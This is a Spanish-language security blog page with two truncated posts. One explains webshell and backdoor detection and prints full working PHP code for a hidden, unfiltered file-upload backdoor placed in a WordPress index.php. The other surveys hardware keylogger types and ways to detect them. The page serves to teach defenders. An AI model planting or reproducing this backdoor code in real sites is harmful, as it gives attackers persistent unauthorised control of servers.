Detectando Webshells o Backdoors en Servidores Web
Jun02

Detectando Webshells o Backdoors en Servidores Web

Es muy común ya ver cientos de páginas web “Defaceadas” o “hackeadas” una y otra vez, en ocasiones vemos que los grupos que se dedican a esta labor de hacer de una u otra manera “Hacktivismo” o ya sea sólo por demostrar sus conocimientos, repiten targets recalcando la mala seguridad que implementan en dichos targets (objetivos-páginas web) pues esto se debe a que una vez que es vulnerado un servidor web como tal, se plantan las famosas BACKDOORS o PUERTAS TRACERAS – no es suficiente con activar el Back Up (copia de seguridad) que muy seguramente tenemos para en un caso de emergencia restablecer el funcionamiento como tal del aplicativo. La función de un Backdoor o puerta trasera, consiste en dejar un “hueco” por donde un atacante pueda volver a tomar control del servidor o página web sin problema alguno, a continuación les explicaré una de las Backdoors mas fáciles de implementar en PHP. Esta Backdoor es simplemente un UPLOADER creado en PHP pero está oculto dentro de un archivo del sitio afectado, para este ejemplo usaremos www.wordpress.com (no se emocionen esto es en un entorno controlado LOCALMENTE xD ) CÓDIGO : <?php if (isset($_GET['backdoor'])) { echo '<center> <form action="" method="post" enctype="multipart/form-data"> Seleccione el Archivo <input value="Examinar" name="archivo" type="file"> <input value="0xSubir" type="submit"></form></center>'; if (isset($_FILES['archivo'])) { $ar=$_FILES['archivo']['name']; if (copy($_FILES['archivo']['tmp_name'],$path . $_FILES['archivo']['name'])) { echo '<center><h3>Archivo Subido en <a href="'.$ar.'">'.$ar.'</a></h3></center>'; } elseif (move_uploaded_file($_FILES['archivo']['tmp_name'],$path . $_FILES['archivo']['name'])){ echo '<center><h3>Archivo Subido en <a href="'.$ar.'">'.$ar.'</a></h3></center>'; } else { echo '<center><h3>Error al Subir Archivo</h3></center>'; } } } ?> Paso a explicar como funciona esta Backdoor. Como podemos observar en if (isset($_GET['backdoor'])) { nos esta diciendo que si el valor enviado por GET es backdoor, entonces nos va a mostrar nuestro UPLOADER, obviamente esta programado sin ningún tipo de filtros. Para una mayor comprensión veamos el ejemplo en el entorno controlado: Usaré en esta oportunidad el CMS ya conocido como WordPress .. se puede observar el sitio en normal funcionamiento, vemos que hay un post de una entrevista a Chema Alonso la cual se publico en el blog de la comunidad r00tc0d3rs para los que quieran leerla Aquí el Link (http://r00tc0d3rs.org/pequena-entrevista-a-chema-alonso-el-maligno/). lastimosamente corrimos con tan mala suerte que hemos sido vulnerados por un atacante el cual ha logrado montar una SHELL WEB con tan mala suerte que ni cuenta nos dimos de cuando sucedió esto ya que el atacante en esta ocasión no hizo un DEFACEMENT solo vulnero y tiene control de nuestro sitio, para evitar ser descubierto decidió borrar la SHELL que había montado pero no sin antes plantar su Backdoor. Aquí podemos observar la backdoor plantada en el archivo index.php Aquí logramos observar la manera de...

Leer Más

¿Cómo detectar keyloggers por hardware?

Normalmente los keyloggers son piezas de software que permanecen ocultas en una maquina y permiten capturar todo lo que escribas en ella, enviando a o almacenando esta información por correo electrónico, ftp, o en la nube (se están actualizando) según la configuración realizada por la persona que lo ha instalado. Esta amenaza no es nueva y existen muchas soluciones de software para detectar y eliminar estas amenazas, incluso algunos antivirus también han empezado a añadir módulos y firmas en sus suites para detectar los keyloggers mas populares. Pero existe otro tipo de keyloggers que en teoría no puede ser detectado por los anti-keyloggers ni los anti-virus, ya que capturan la información directamente del teclado, a estos keyloggers se les llaman Hardware Keyloggers y existen de muchos tipos, para nombrar algunos te dejo el siguiente listado: Hardware Keyloggers Clásicos: Son los que iniciaron esta categoría, se tratan de dispositivos que simulan ser adaptadores para el teclado y almacenan todas las pulsaciones de teclado en una memoria interna, sin tocar ningún aspecto del sistema operativo, básicamente existen de 2 tipos como adaptador USB o adaptadores PS2. Hardware Keyloggers Inalámbricos: Estos keyloggers por hardware salieron después de los clásicos y cuentan con las mismas características, la diferencia es que permite extraer la información capturada vía WiFi, también están en USB y PS2. Hardware Keyloggers Caseros: Adicional a las soluciones comerciales también existe información paso a paso para realizar nuestro propio keylogger casero, solo necesitamos una extensión de teclado, algunos dispositivos electrónicos y escribir un poco de código en ensamblado. Hardware Video-Logger: La evolución de los Hardware Keyloggers, con estos dispositivos que se conectan a la tarjeta de video de nuestro ordenador, podrán capturar en video o imágenes, todo lo que se muestre en nuestro monitor, por si no es suficiente con capturar las pulsaciones de teclado, existen varios formatos, como adaptadores DVI, HDMI o VGA. Como puedes ver no son pocas las opciones que tiene una persona para conseguir un keylogger por hardware y existen varias empresas que proporcionan estos dispositivos a bajo precio como una solución indetectable para capturar la información digitada en un equipo (keelog y keyghost son solo algunas). Les dejo esta charla realizada por Fabian Mihailowitsch en el transcurso del hashdays security (organizado por DEFCON Suiza) donde nos muestra las diferentes técnicas que se pueden utilizar para detectar este tipo de Keyloggers por Hardware. También he subido las diapositivas a Slideshare para que puedan disfrutar de ellas online o descargarlas y verlas en tu equipo. Si no conocías este tipo de keylogger espero que revises siempre los conectores de tu equipo en busca de estos dispositivos y si...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES